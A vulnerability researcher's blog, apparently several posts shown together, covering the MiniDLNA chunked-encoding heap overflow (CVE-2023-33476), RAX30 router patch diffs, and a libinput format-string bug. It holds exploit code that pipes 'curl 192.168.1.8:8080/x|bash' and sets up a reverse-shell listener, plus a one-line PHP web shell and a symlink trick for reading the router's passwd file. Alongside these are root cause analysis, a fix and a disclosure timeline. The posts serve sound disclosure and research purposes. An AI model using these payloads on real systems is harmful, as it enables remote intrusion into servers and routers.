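    payload += struct.pack("<Q", system_addr)  # free() entry
    payload += struct.pack("<Q", 0)            # pad
    payload += struct.pack("<Q", system_addr)  # fprintf() entry
    return payload


SYSTEM_ADDR = 0x7FFFF7E12345  # placeholder value, not a real address
payload = build_payload(b"curl 192.168.1.8:8080/x|bash", SYSTEM_ADDR)

# the string system() sees ends at the first NUL byte
print(payload.split(b"\x00")[0])
print(hex(struct.unpack_from("<Q", payload, OFFSET_TO_FREE)[0]))
```

Checking the unpacked values at both offsets before sending anything is a cheap way to catch an off-by-8 when adapting the payload to a different binary.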

reverse shell stager and listener

The command string passed to system() will download a script from an attacker-controlled server using curl and pipe the contents of the script to bash. The exploit sets up an HTTP listener to handle the incoming request and responds with a small script to initiate a reverse shell back to the attacker-controlled server. After responding to that request, it creates the listener for the reverse shell and waits for the connection.

    # handle the http request to serve script to spawn reverse shell
    l.settimeout(1)
    x = l.wait_for_connection()
    if x.connected():
        l.sendline(resp.encode() + reverse_shell_cmd.encode())
        l.close()
    else:
        xerr("=ERROR=: Timed out waiting for staging connection, exploit likely failed")
        xpr("tip: try adjusting the --got_addr or --system_addr arguments if SEGV; make sure curl is available on target")
        sys.exit(1)

    # wait for the incoming reverse shell connection; bail if we don't get it in a second.
    l = pwn.listen(args.lport)
    l.settimeout(1)
    x = l.wait_for_connection()
    if x.connected():
        xpr("~~~  ~~~")
        l.interactive()
    else:
        xerr("=ERROR=: Timed out waiting for reverse shell connection, exploit likely failed")
        xpr("tip: try adjusting the --got_addr or --system_addr arguments if SEGV; make sure netcat is available on target")
        sys.exit(1)

popping a shell

And here’s the exploit running against the target binary:

Wrapping Up

And there we are! Hopefully this has all been useful for understanding everything that goes into writing a full exploit for this kind of vulnerability. Ultimately, it isn’t complete in the sense that it assumes an info leak is already present to leak Libc and GOT addresses. This same bug could potentially be used to get that info leak but I didn’t invest much time in figuring that out. Maybe that can be left as an exercise for the curious reader.

exploitability in the Real World(TM)

Exploitability of this bug will be dependent upon the Libc version the application is linked against and compiler exploit mitigations used, to some extent. Given the variability of these factors across the range of devices this application is deployed to (IoT, routers, linux servers), there is a high likelihood of finding Libc versions vulnerable to multiple heap exploit techniques and missing exploit mitigations such as ASLR, RELRO, etc. Ultimately, because the bug provides for a strong write primitive, there are various options for exploitation. While most modern Linux distros running on desktop/server hardware now enable common compiler exploit mitigations for default applications and applications installed through the package manager, MiniDLNA is frequently deployed on IoT devices where those mitigations are likely to not be enabled; versions built from source by end-users are also unlikely to enable these mitigations. The exploit strategy and mechanisms used in the included exploits will not work universally across all platforms and configurations, but there are likely dozens of targets that would meet the necessary criteria.

arm32 exploit?

This post is already pretty long and it’s taken me longer than expected to release it, so I’ve decided to split the last section going over the exploit I wrote for the arm32 minidlnad binary from the Netgear RAX30 into a separate post, though the exploit code for both will be made available now. That exploit works a little differently, targeting the stack rather than the GOT for overwrite since that binary has full RELRO enabled (which makes the GOT read-only).

Resources

chonked pt.1: MiniDLNA 1.3.2 HTTP Chunk Parsing Heap Overflow (CVE-2023-33476) Root Cause Analysis

2023-05-31T00:00:00+00:00

This post provides the details and a root cause analysis of a heap buffer overflow vulnerability I discovered in the HTTP chunk parsing code of MiniDLNA, affecting versions up to 1.3.2. This vulnerability can be exploited to achieve remote code execution in the context of the user that the minidlna server is running as. The issue was reported to the package maintainer following best practices for responsible disclosure and a fixed version is now available. A follow up post will be published soon with a detailed write-up of the exploit development process along with two fully weaponized exploits for both x86_64 and ARM32 targets, so stay tuned :)

Update: The second part of this post has been published and can be found here

Introduction

Update 2023-06-02: The vulnerability has been assigned CVE-2023-33476.

This post will go over the details and root cause of a heap buffer overflow vulnerability I discovered in the HTTP chunk parsing code of MiniDLNA, affecting up to version 1.3.2. This vulnerability can be exploited to achieve remote code execution in the context of the user that the minidlna server is running as.

The second part of this post contains a detailed write-up of the exploit development process along with two fully weaponized exploits for both x86_64 and ARM32 targets and can be found here.

Vulnerability Summary

MiniDLNA is a simple media server software, with the aim of being fully compliant with DLNA/UPnP-AV clients. It is commonly deployed on Linux servers and across a wide range of embedded devices like routers and NAS devices.

The latest version of the MiniDLNA/ReadyMedia media server contains a vulnerability in the HTTP request processing code responsible for handling requests that use chunked encoding which can result in an out-of-bounds read/write leading to remote code execution. The issue occurs in the validation logic for chunk sizes in ParseHttpHeaders() and results in the return value of a comparison expression being incorrectly saved to a variable used to track the parsed chunk size rather than the return value of strtol() that’s used to parse the size. This allows for values larger than the total request size to pass validation; the application later parses and passes these chunk size values as the size argument in call(s) to memmove(), resulting in an OOB read/write on the heap.

Affected Versions

All versions between 1.1.5 and 1.3.2 (inclusive)
Default versions provided by apt on Debian 11 and Ubuntu 22.04
Version deployed on the Netgear Nighthawk RAX30 w/ latest patches

Minimal Testcase to Trigger the Bug

This testcase will trigger the bug by passing a huge value (0xffffff) that is much larger than the total request length sent, resulting in an OOB read past the end of the request buffer allocation and into unmapped memory. The application should crash with a segmentation fault.

GET /status HTTP/1.0\r\nTransfer-Encoding:chunked\r\n\r\nffffff\r\n0\r\n\r\n
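To make the mismatch in this testcase concrete, the short Python sketch below compares the size declared by the first chunk with the number of bytes that actually follow it in the request. `first_chunk_overrun` is a hypothetical helper written for this illustration; it is not part of MiniDLNA or the exploit.

```python
def first_chunk_overrun(request: bytes):
    """Return (declared size of the first chunk, bytes present after its size line)."""
    _headers, _sep, body = request.partition(b"\r\n\r\n")
    size_line, _sep, rest = body.partition(b"\r\n")
    declared = int(size_line.strip(), 16)  # chunk sizes are hex
    return declared, len(rest)


testcase = (
    b"GET /status HTTP/1.0\r\n"
    b"Transfer-Encoding:chunked\r\n"
    b"\r\n"
    b"ffffff\r\n"
    b"0\r\n"
    b"\r\n"
)

declared, available = first_chunk_overrun(testcase)
print(declared, available)
# 16777215 5
```

The first chunk claims roughly 16MB of data while only 5 bytes follow its size line, which is the kind of request the chunk size validation is supposed to reject.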

Discovery

I originally discovered this vulnerability while fuzzing an older version of the software while hunting for bugs on the Netgear RAX45. I wasn’t familiar enough with the code base to know exactly the right place to fuzz so I just chose to go for the most reachable part of the code: HTTP request handling. Fuzzing was done using both LibFuzzer and AFL++ using custom harnesses. I made some minor changes to the code to improve fuzzability, including removal of the network read/write functionality, but otherwise no other changes were needed.

The core portion of the harness used to find this particular bug is shown below. The full harness code and other helper code will be released soon.

#include <stddef.h>   /* size_t */
#include <stdlib.h>   /* malloc(), free() */
#include <string.h>   /* memcpy(), strstr() */
#include "minixml.h"
#include "upnphttp.h"
#include "upnpsoap.h"
#include "containers.h"
#include "upnpreplyparse.h"
#include "scanner.h"
#include "log.h"

void ProcessHttpQuery_upnphttp(struct upnphttp *);

int LLVMFuzzerTestOneInput(char *buf, size_t size)
{
    struct upnphttp *h = New_upnphttp(1);
    const char *endheaders;
    h->req_buf = (char *)malloc(size+1);
    if (!h->req_buf)
    {
      return 0;
    }
    memcpy(h->req_buf, buf, size);
    h->req_buflen = size;
    h->req_buf[h->req_buflen] = '\0';
    /* search for the string "\r\n\r\n" */
    endheaders = strstr(h->req_buf, "\r\n\r\n");
    if(endheaders)
    {
      h->req_contentoff = endheaders - h->req_buf + 4;
      h->req_contentlen = h->req_buflen - h->req_contentoff;
      ProcessHttpQuery_upnphttp(h);
      free(h->req_buf);
      free(h->res_buf);
      free(h);
      return 0;
    }
    free(h->req_buf);
    free(h->res_buf);
    free(h);
    return -1;
}

After a few days of fuzzing, tweaking the harnesses, and fuzzing some more, I had come across a handful of crashes that seemed somewhat promising. Among them was this one.

An interesting side note here: thanks to Netgear’s terrible practices with their GPL code releases, it turned out that the actual device I was testing against (RAX45) was not only running a newer version than the one they included in their GPL package, it was also a custom fork that apparently had fixed these bugs already. I confirmed this by reversing the binary taken straight from the device. Maybe it’s just me, but it’s nuts that they’re fixing vulnerabilities in their internal forks of open source code and not providing those fixes in their GPL packages, let alone pushing them upstream. After discovering this I decided to pivot to just focusing on the latest code from the MiniDLNA Git repo and confirmed that version was vulnerable as well.

Root Cause Analysis

The vulnerable code is reached for any valid request that includes the Transfer-Encoding:chunked HTTP header and that meets the following conditions:

Correctly terminates the HTTP headers with \r\n\r\n sequence
Includes a terminator chunk at the end of the request body with a chunk size of 0
Correctly follows chunk size values with terminator sequence \r\n

The function call chain is shown below, beginning in Process_upnphttp() (upnphttp.c:1096):

Process_upnphttp() →
    ProcessHttpQuery_upnphttp(h) →
        ParseHttpHeaders(h) ← (returns)
    ProcessHttpQuery_upnphttp(h) -- VULNERABLE CODE

Initial Request Handling: Process_upnphttp()

The code responsible for the initial reception and processing of requests is in Process_upnphttp() and is described below.

Process_upnphttp(), upnphttp.c:1096

Data is read from the socket using recv(), up to 2048 bytes at a time, into a fixed-size 2048-byte local char buffer. If data is received, the code calculates new_req_buflen as req_buflen + bytes_recv'd + 1 (leaving room for a null terminator) and checks whether the new buffer length would reach or exceed a max value of 1MB. If so, an error is returned; otherwise the code continues.

    struct upnphttp *h = ev->data;
    char buf[2048];
    [...]
    {
        int new_req_buflen;
        const char * endheaders;

        // new buf_len is the sum of the last calculated req_buflen and the
        // number of bytes the call to `recv` returned, plus 1 for the null terminator
        new_req_buflen = n + h->req_buflen + 1;

        // check to see if the new buf len exceeds a max value (1MB)
        if (new_req_buflen >= 1024 * 1024)
        {
            DPRINTF(E_ERROR, L_HTTP, "Receive headers too large (received %d bytes)\n", new_req_buflen);
            h->state = 100;
            break;
        }
    }

Further down in this function, realloc() is called using the calculated new_req_buflen as the size and passing the pointer h->req_buf as the buffer to perform the reallocation on. On the first round of processing (i.e. the first 2048 bytes received) h->req_buf will be NULL and realloc() behaves like a normal call to malloc(). The data is copied from the local buffer into the buffer pointed to by h->req_buf and the h->req_buflen field of the upnphttp struct is updated with the new size.

                h->req_buf = (char *)realloc(h->req_buf, new_req_buflen);
                if (!h->req_buf)
                {
                    DPRINTF(E_ERROR, L_HTTP, "Receive headers: %s\n", strerror(errno));
                    h->state = 100;
                    break;
                }

                // copy n bytes from the local `buf[2048]` to the alloc'ed memory
                // req_buflen will be 0 on the first round of processing since it's not updated
                // until the next line.
                memcpy(h->req_buf + h->req_buflen, buf, n);
                // update req_buflen
                h->req_buflen += n;

Next, the buffer is null terminated and then passed to strstr() to search for an \r\n\r\n sequence to determine whether the full HTTP headers section of the request has been received. Upon finding this sequence, the start of the request body and its size are also calculated and the respective values in the upnphttp struct (req_contentoff and req_contentlen) are updated. The code then calls ProcessHttpQuery_upnphttp() to move onto parsing.

            h->req_buf[h->req_buflen] = '\0';

            // search for the string "\r\n\r\n" and calculate content offset and content length if
            // found
            endheaders = strstr(h->req_buf, "\r\n\r\n");

            if(endheaders)
            {
                h->req_contentoff = endheaders - h->req_buf + 4;
                h->req_contentlen = h->req_buflen - h->req_contentoff;
                ProcessHttpQuery_upnphttp(h);

NOTE: The headers have only been read into h->req_buf at this point without parsing; they will be parsed into fields of the upnphttp struct within the call to ProcessHttpQuery_upnphttp() at the end of this code block.

ProcessHttpQuery_upnphttp():

The first call to this function only happens once the \r\n\r\n sequence is found, indicating the end of the HTTP header section was received. After parsing the HTTP verb and path, it calls ParseHttpHeaders() to perform the actual parsing of the header data before doing anything else; the source of the vulnerability is found here.

When ParseHttpHeaders() returns and indicates the full request was received by setting h->req_chunklen to 0, processing of the chunks in the HTTP body will resume in ProcessHttpQuery_upnphttp(); this is where the corruption caused by the bug is triggered when h->req_chunklen is passed to memmove() without validating that it does not exceed the allocated buffer.

BUG: Incorrect Chunk Size Validation in ParseHttpHeaders()

After reading data from the socket and finding the end of the HTTP header section as indicated by the presence of the \r\n\r\n sequence, Process_upnphttp() passes the request off to ProcessHttpQuery_upnphttp(), which in turn calls ParseHttpHeaders() to perform the actual parsing of the header data into a upnphttp struct. If the HTTP headers contain the Transfer-Encoding:chunked header, a flag is set on the structure which will result in the application reaching the vulnerable code on line 428.

After some rudimentary sanity checks of the h->req_chunklen and h->req_contentoff fields of the struct, the code iterates through the rest of the request body, attempting to read the numeric size values for each of the chunks at the expected offsets based on sizes read. It combines the step of reading the size value and attempting to perform the size validation inside the conditions of the following while loop:

    while( (line < (h->req_buf + h->req_buflen)) &&
           (h->req_chunklen = strtol(line, &endptr, 16) > 0) &&
           (endptr != line) )

The following checks are performed:

Check whether the char pointer line has been incremented past the end of the allocation in h->req_buf. line is incremented by the parsed req_chunklen at the end of the inner block of the while loop.
Attempt to parse a size value using strtol() and ensure the value is greater than 0.
Ensure the char pointer endptr is not pointing to the same location as line after the call to strtol(), which would indicate no parsable digit was found.

The bug occurs in the evaluation of the second condition, where strtol() is called; the intent is for the return value of strtol() to be saved to h->req_chunklen and to compare the saved value to 0 for the validation step. Instead, the result of the comparison expression strtol(x,x) > 0 is saved to h->req_chunklen, resulting in the incorrect calculation of the total expected request size as the Boolean result of the expression would evaluate to 1 for all numbers greater than 0.

Within the inner block of the while loop, the value saved to h->req_chunklen is used to increment the line pointer to the location where the next chunk size is expected, indicating the true intent of the code (comments added for annotation).

    {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        {
            return;
        }

        // if strtol() returned a size greater than 0, `line` will only ever be incremented
        // by 1 (the bool eval of the comparison in int) at most, which means the first validation
        // condition in the while loop will not properly detect large values that exceed the size
        // of the request buffer allocation
        line = endptr+h->req_chunklen+2;
    }

This means that even for very large chunk sizes, the line pointer will only ever be incremented by 1 at most for each iteration through the loop, meaning the validation check in the first condition of the while loop will not be triggered and catch these sizes that exceed the length of data sent in the request body.
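The effect is easier to see in a small model. The Python sketch below mimics only the while loop shown above (not the rest of ParseHttpHeaders()) and records what ends up stored in req_chunklen and where line ends up, for both the buggy and the intended assignment. `strtol16` and `walk_chunk_sizes` are hypothetical helpers; `strtol16` is a rough stand-in for strtol() that ignores signs and 0x prefixes.

```python
import string

HEX_DIGITS = set(string.hexdigits.encode())


def strtol16(buf, pos):
    """Rough stand-in for strtol(buf + pos, &end, 16); returns (value, end)."""
    i = pos
    while i < len(buf) and buf[i:i + 1].isspace():
        i += 1
    start = i
    while i < len(buf) and buf[i] in HEX_DIGITS:
        i += 1
    if i == start:
        return 0, pos  # nothing parsed: end stays at the starting position
    return int(buf[start:i], 16), i


def walk_chunk_sizes(body, buggy):
    """Model of the loop only; returns (values stored in req_chunklen, final line)."""
    line, stored = 0, []
    while line < len(body):
        value, end = strtol16(body, line)
        # buggy: `a = strtol(...) > 0` stores the comparison result (0 or 1)
        chunklen = int(value > 0) if buggy else value
        stored.append(chunklen)
        if chunklen <= 0 or end == line:
            break
        crlf = body.find(b"\r\n", end)
        if crlf < 0:
            break
        line = crlf + chunklen + 2
    return stored, line


body = b"ffffff\r\n0\r\n\r\n"
print(walk_chunk_sizes(body, buggy=True))   # ([1, 0], 9)
print(walk_chunk_sizes(body, buggy=False))  # ([16777215], 16777223)
```

With the buggy assignment line never leaves the 13-byte body, so the bounds check in the first condition has nothing to catch. With the intended assignment line jumps far past the end of the buffer on the first iteration and the loop stops with a non-zero chunk length still stored.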

OOB read/write on chunk sizes > request length in ProcessHttpQuery_upnphttp()

After the headers have been parsed in ParseHttpHeaders(), execution returns to ProcessHttpQuery_upnphttp(), where the value saved to h->req_chunklen is checked; if it is 0 after the request header parsing, it is assumed that the full request has been received and that the request buffer at h->req_buf is large enough to fit all the expected data based on chunk sizes.

Parsing of the actual chunks from the request body then continues in the code block below (upnphttp.c:893) after returning from ParseHttpHeaders():

    char *chunkstart, *chunk, *endptr, *endbuf;
    // chunk, endbuf, and chunkstart all begin pointing to the start of the http request body
    chunk = endbuf = chunkstart = h->req_buf + h->req_contentoff;

    while ((h->req_chunklen = strtol(chunk, &endptr, 16)) > 0 && (endptr != chunk) )
    {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        {
            Send400(h);
            return;
        }
        endptr += 2;

        // this call to memmove will use the chunklen parsed by strtol() above
        // without checking that it doesn't read beyond the end of the request buf.
        memmove(endbuf, endptr, h->req_chunklen);

        endbuf += h->req_chunklen;
        chunk = endptr + h->req_chunklen;
    }
    h->req_contentlen = endbuf - chunkstart;
    h->req_buflen = endbuf - h->req_buf;
    h->state = 100;

Summary of while loop conditions/checks:

Condition 1:
- Attempt to parse a chunk size number as a long using strtol(), passing in the chunk pointer which begins the while loop pointing to the start of the request body section (immediately following the headers). The number will be parsed as base 16, meaning hex digits A-F are considered valid.
- The return value of the call to strtol() is saved to h->req_chunklen and a comparison is performed to check whether it is greater than 0; this must evaluate true for the parsing to continue
Condition 2:
- Check that the value that strtol() saved to endptr does not point to the same place as chunk, which would indicate that no valid numeric value could be parsed from the string.

The code in this block relies on the validation performed during the header parsing step and so it parses and uses the user-controlled chunk size as the size argument in calls to memmove() without bounds checking. This results in the application accepting chunk size values that exceed the number of bytes received in the request, leading to an OOB read/write.

The while loop used to iterate through the chunks in this block is nearly identical to the one in ParseHttpHeaders(), except this one includes an additional set of parentheses around the assignment and comparison expressions in the call to strtol(), resulting in the correct assignment of the return value to h->req_chunklen. Had the same bug present in the ParseHttpHeaders() chunk size parsing code been introduced here, it would have probably been noticed much sooner as chunks would likely get truncated as a result of the incorrect logic.
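To show what the unchecked memmove() does to neighboring memory, here is a toy Python model of the chunk loop above. It is a sketch under a few assumptions: a flat bytearray stands in for the heap, the bytes after the request stand in for whatever chunk happens to follow it, and `strtol16` and `dechunk_in_place` are hypothetical helpers rather than MiniDLNA code.

```python
import string

HEX_DIGITS = set(string.hexdigits.encode())


def strtol16(buf, pos):
    """Rough stand-in for strtol(buf + pos, &end, 16); returns (value, end)."""
    i = pos
    while i < len(buf) and buf[i:i + 1].isspace():
        i += 1
    start = i
    while i < len(buf) and buf[i] in HEX_DIGITS:
        i += 1
    if i == start:
        return 0, pos
    return int(buf[start:i], 16), i


def dechunk_in_place(heap, body_off):
    """Model of the chunk loop; returns the new end of the body (endbuf)."""
    chunk = endbuf = body_off
    while True:
        value, end = strtol16(heap, chunk)
        if value <= 0 or end == chunk:
            break
        crlf = heap.find(b"\r\n", end)
        if crlf < 0:
            break
        src = crlf + 2
        if src + value > len(heap):
            raise ValueError("read ran off the end of the toy heap")
        # memmove(endbuf, endptr, chunklen): nothing ties chunklen to the request size
        heap[endbuf:endbuf + value] = heap[src:src + value]
        endbuf += value
        chunk = src + value
    return endbuf


# 16-byte "request body": an 8-byte size line claiming 0x10 bytes, but only 8 sent
request = b"    10\r\n" + b"A" * 8
neighbor = b"NEIGHBOR" + b"\x00" * 16  # stand-in for the adjacent heap chunk
heap = bytearray(request + neighbor)

endbuf = dechunk_in_place(heap, 0)
print(bytes(heap[:16]))
# b'AAAAAAAANEIGHBOR'
```

The 8 bytes that belonged to the neighboring chunk now sit inside the request buffer, moved toward lower addresses by the length of the chunk size line (8 bytes in this toy example, whitespace included).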

Conclusion

Suggested Fix

The issue can be fixed by wrapping the assignment expression in the second condition of the while loop in ParseHttpHeaders() (upnphttp.c:150) used to validate chunk sizes in parentheses to correctly separate the assignment from the comparison expression that compares the value to 0.

The fixed code would be:

    while ((line < (h->req_buf + h->req_buflen)) &&
           ((h->req_chunklen = strtol(line, &endptr, 16)) > 0) && // FIX HERE
           (endptr != line) )

A patch with this fix was provided to the package maintainer along with the vulnerability report.

Disclosure Timeline

2023-04-18: Submitted vulnerability report to Zero Day Initiative RE: vulnerable Netgear RAX30
2023-05-04: ZDI rejects the vulnerability report (not interested in the product)
2023-05-05: Request a CVE ID from Mitre
2023-05-05: Unable to find a private avenue to report to the package maintainer directly, so instead submit reports to Debian and Ubuntu security teams since they have vuln versions in their repos
2023-05-08: Debian security team shares the email address of the package maintainer; reach out to them over email and submit a private bug report on the Sourceforge page.
2023-05-08: Package maintainer acknowledges report and begins working on fix
2023-05-31: Package maintainer releases fixed version, 1.3.3
2023-05-31: Follow up message to Mitre, CVE assignment pending
2023-06-02: Mitre assigns the vulnerability CVE-2023-33476

Exploitation

As this is a heap-based vulnerability, exploitability of this issue will be dependent upon the Glibc version the application is linked against and compiler exploit mitigations, to some extent. Ultimately, because the bug provides for a strong read/write primitive, there are various options for exploitation.

Part 2 of this series going over the exploit development process and the exploits I wrote for this bug can be found here.

Reference/Links

RAX30 Patch Diff Analysis & Nday Exploit for ZDI-23-496

2023-05-12T00:00:00+00:00

Having recently spent some time working on an exploit for an 0day I’d found on the RAX30, the recent release of a few ZDI advisories for this device caught my attention. I took a quick look to confirm there weren’t any collisions with my bug, and after confirming this wasn’t the case (phew!), I decided to use this as an opportunity to do some patch diff analysis and see if there were any bugs worth writing exploits for.

Overview

Target bugs:

ZDI-23-499: soap_serverd buffer overflow
ZDI-23-496: lighttpd misconfiguration -> RCE

Target firmware versions:

Prepatch: 1.0.9
Patched: 1.0.10

Analysis

ZDI-23-499: soap_serverd stack-based buffer overflow

The description of this bug says the flaw occurs because “when parsing SOAP message headers, the process does not properly validate user supplied data before copying it to a fixed-length stack buffer.” Based on my previous experience with Netgear and specifically their SOAP server implementations, I had a pretty good idea where to look. In fact, I even had a hunch that this was the same as (or similar to) a bug I’d found on another Netgear device last year, and so before spending much time going through the diff’ed binaries, I did a quick search for references to sscanf in the patched and nonpatched versions and pretty easily identified where the bug occurred. Interestingly, this bug is very similar to but still distinct from the issue I’d previously found – leave it to Netgear to ship two unique vulnerabilities using the same vulnerable C functions and in code that processes the same data lol.

The bug is caused by use of sscanf() without supplying length-limit values in the format string. The vulnerable version of the code attempts to parse out the HTTP method, path, and HTTP version string from the header using the following code:

    iVar1 = __isoc99_sscanf(local_3024,"%[^ ] %[^ ] %[^ ]",&v1, &v2, &v3);
    if (iVar1 == 3) {
      iVar7 = strcasecmp((char *)&v1, "post");

This is the patched version of the same code, showing the addition of length limit specs in the format string:

    iVar1 = __isoc99_sscanf(&local_1824,"%511[^ ] %511[^ ] %511[^ ]",&v1, &v2, &v3);
    if (iVar1 == 3) {
      iVar7 = strcasecmp((char *)&v1,"post");

On the surface this looks like a pretty straightforward stack-based buffer overflow, and there seem to be some variables within the function that may be interesting targets for overwrite. An interesting note is that the advisory does not indicate this bug results in code execution but instead specifically mentions that it can be used to bypass authentication. This may be due to the fact that the binary is built with stack canaries, which makes exploitation more difficult. This is the same reason why I’d been unable to exploit the variant of this bug I mentioned earlier.

NOTE: The folks who discovered and exploited this bug at Pwn2Own posted their write-up of this bug before I had finished this post so I’ve been able to confirm the above assumption was correct: the stack canaries resulted in the bug not being directly exploitable for code exec. Check out their write-up here to see how they chained this bug with a few others to get RCE.

ZDI-23-496: lighttpd Misconfiguration RCE

The information provided about this bug indicates it isn’t a memory corruption issue but a misconfiguration that results in arbitrary code execution. Specifically it says:

The specific flaw exists within the configuration of the lighttpd HTTP server. The issue results from allowing execution of files from untrusted sources. An attacker can leverage this vulnerability to execute code in the context of root.

Based on this description, I focused on comparing the lighttpd configuration files in etc/lighttpd between the two versions.

Comparing Config Changes

etc/lighttpd/conf.d/lighttpd4.conf

The patched version of this file includes the following additions:

Addition of alias.url = ("/shares" => "/var/samba/share/") at the global level
Inside the HTTP["url"] = "^/shares" definition for “usb storage” in the IPv4 section
- server.follow-symlink = "disable"
- static-file.exclude-extensions = ()
- fastcgi.server = ()

etc/lighttpd/conf.d/usb_lighttpd.conf

Addition of alias.url = ("/shares" => "/var/samba/share/") at the global level

etc/lighttpd/conf.d/usb_allow.inc

Inside the HTTP["url"] = "^/shares" definition for “usb storage” in the IPv4 section
- server.follow-symlink = "disable"
- static-file.exclude-extensions = ()
- fastcgi.server = ()

etc/lighttpd/conf.d/usb_allow_auth.inc

Inside the HTTP["url"] = "^/shares" definition for “usb storage” in the IPv4 section
- server.follow-symlink = "disable"
- static-file.exclude-extensions = ()
- fastcgi.server = ()

Conclusions Based on Changes

The issue seems to be focused around the /shares path, which is mapped to the samba share directory where mounted USB drives can be accessed on the network like a NAS. The addition of server.follow-symlink = "disable" suggests the issue may result in the ability to access files on the host filesystem using symlinks on the mounted drive.

It’s possible that the addition of fastcgi.server = () was needed to avoid having the global settings for these handlers apply. The top level fastcgi.server assignment in conf.d/lighttpd4.conf shows the following:

fastcgi.server += (
	".php" => ((
		"socket" => "/var/run/php-fpm.sock",
		#"bin-path" => "/bin/php-fpm -n -R -y /etc/php-fpm.conf",
		#"max-procs" => 1,
		"broken-scriptfilename" => "enable"
	))
)

This led me to believe the absence of an explicit fastcgi.server = () in the pre-patched version resulted in the global setting being applied, which would allow PHP files to be executed.

Exploits: ZDI-23-496 Lighttpd Misconfiguration

Based on the conclusions drawn from the changes made, the most likely entry point was going to be files mounted via USB drive so I created an ext2-formatted drive to use for testing (ext2 since it was going to be necessary to create symlinks) and downgraded to the vulnerable firmware version.

Local File Inclusion via Symlink

My assumption was that the addition of the symlink config options in the latest patches meant that the vulnerable version would follow symlinks resulting in the ability to reference (and access) files outside of the USB filesystem. To test this, I created a symlink on the USB drive pointing to /var/passwd as this is where the actual passwd file is stored on the device at runtime. If the assumption is correct, accessing this file from the router should return the actual password file from the device.

After connecting the USB drive to the router, the files become visible at http:///shares/. Accessing the symlink that was created pointing to /var/passwd results in the actual password file on the device (found at that path) being returned and downloaded locally.

RCE via PHP Files

To test the assumption regarding PHP files mounted via USB being executable, I used the same USB stick, this time simply creating a PHP file to execute phpinfo(); as a simple way to confirm execution. This worked as expected and the PHP info output was shown on the page. I then created a simple PHP page that would allow me to pass shell commands in a URL parameter for easy shell access.

PHP shell command proxy:

<?php echo system($_GET['cmd']); ?>

Finally, I used this to have the device download a shell script over HTTP from my machine to open a reverse shell:

Conclusion

This turned out to be a fun exercise, and some of my prior experience with Netgear devices proved to be useful.

The soap_serverd issue was exploited during the latest Pwn2Own as part of a longer exploit chain that eventually resulted in RCE, though direct exploitation seems infeasible due to the presence of stack canaries.

For the lighttpd issue, exploitation requires physical access to the device, at least long enough to plug in the USB drive and send the necessary requests. This isn’t infeasible, though considering these routers are primarily used in SOHO settings this may not be quite as critical as a fully remote RCE.

References/Links

nday exploit: libinput format string bug, canary leak exploit (cve-2022-1215)

2022-08-04T00:00:00+00:00

At the end of last year I stumbled on a crash in Xorg while playing with the GreatFET One but never really got around to following up on it. Then a few weeks ago, I decided to finally root cause the issue and while in the middle of doing so I discovered that the issue had been reported and fixed only 3 months ago. Since I’d already started working on it though, I decided to just move onto writing some exploits. In this post I walk through the details of writing an exploit to leak the stack canary.

Discovery

This is an issue that I had independently discovered in Xorg (or so I thought) a while back while messing around with the GreatFET One, a cool little device for USB hacking. While trying out some random payloads I found that connecting a USB keyboard device with format strings in certain device descriptor fields caused Xorg to crash. Specifically, it was the manufacturer, serial, and product string fields. Unfortunately, I quickly ran into issues while trying to set up a testing environment as I would immediately crash my own X session as soon as I connected the device, even when trying to pass it through to a VM directly. I decided to just save it for another day when I had time to figure out a good solution to those issues, but it ended up sitting for months and I never really went back to it.

Then, a couple of weeks ago I saw some CVEs get released for something in Xorg that seemed tangentially related to input devices, which piqued my attention. It got me wondering whether it was the same bug I had found, so I dug up my notes and decided to take a closer look. While doing this I figured out that the issue was actually not in Xorg itself (at least not completely), but actually in libinput. Once I’d figured this out, I went looking for the libinput source code to find the code for the functions I was seeing in the backtrace and ended up finding the specific commit where the issue was fixed in April of this year. Well, shit lmao.

Root Cause Analysis

The reporter of the issue provided a detailed description of the vulnerability in the report. Here’s a snippet that’s a good tl;dr:

- Newly connected evdev devices are logged using evdev_log_msg.
- The format parameter is manipulated at src/evdev.h:785 to prepend (among other things) the device name.
- The resulting string buf is then passed as the format parameter to log_msg_va at src/evdev.h:796
- In X.org (and probably other users of libinput), this logging function eventually leads into the system's sprintf.
- If the device name contains printf-style formatting placeholders such as %s or %d, these will be passed on to the new format string, and interpreted incorrectly. User-controlled format strings are a known security vulnerability, CWE-134, and can be used by an attacker to execute malicious code.

Basically, the issue came down to the fact that user-controlled input was prepended to a predefined format string before being used as the format argument in a call to sprintf().
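To make the bug class concrete, here is a minimal Python analogue of the pattern described above. It is only a sketch: the function names and message text are made up for illustration, and Python's % operator raises an exception on a mismatched format string instead of reading stray values off the stack the way C's printf family does.

```python
def log_unsafe(device_name, tags):
    # BUG (mirrors the pattern above): the device name becomes part of the
    # format string itself, so any % placeholders in it get interpreted.
    fmt = device_name + " is tagged by udev as: %s"
    return fmt % (tags,)


def log_safe(device_name, tags):
    # Fix: the format string is constant and the name is passed as data.
    return "%s is tagged by udev as: %s" % (device_name, tags)


if __name__ == "__main__":
    print(log_safe("%s%s keyboard", "Keyboard"))
    try:
        log_unsafe("%s%s keyboard", "Keyboard")
    except TypeError as exc:
        # Python notices the missing arguments; C would keep reading args.
        print("unsafe formatter failed:", exc)
```

The safe variant treats the device name purely as an argument, which is the general shape of the fix for any user-controlled format string.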

While doing some more digging on specific components of libinput I came across the blog post where the reporter(s) talked about accidentally stumbling across the issue and their root causing process (no surprise, it's actually a security company lol). Check out that post for a great analysis and description of exactly where the issue happens.

So, the root cause analysis was already done…but no poc exploit code was provided. There was an interesting discussion around the likelihood/plausibility of exploitation in the git issue between the reporter(s) and developers where they discussed potential avenues for exploitation and the true impact/risk (check it out for details). tl;dr the determination was that at best the bug provides an attacker with an info leak and nothing else but at worst could potentially lead to code execution.

With that in mind, I thought it still might be worth doing the work of exploring both the info leak and the potential for RCE and produce exploits for both (hopefully).

Exploit: Leaking the Stack Canary

I started off with the info leak exploit. One of the most useful things an info leak can provide is the ability to leak the stack canary so I decided that would be the goal of the exploit. Because the canary value is stored on the stack and format string arguments are read from the stack, it's usually possible to do this pretty easily.

Testing environment:

Debian 11 host
Xubuntu 20.04 VM in Virtualbox
USB host device passthrough to the VM
Set up SSH on VM

First things first, though: in order for a format string to be useful for this kind of info leak, there needs to be a way to get output back from the program that shows the values read from the stack. Thankfully, in this case, the output is written to the Xorg log file, which is world-readable. With that confirmed, the next step was figuring out exactly where the stack canary was so it could be found reliably.

Constraints: Field Length Limit

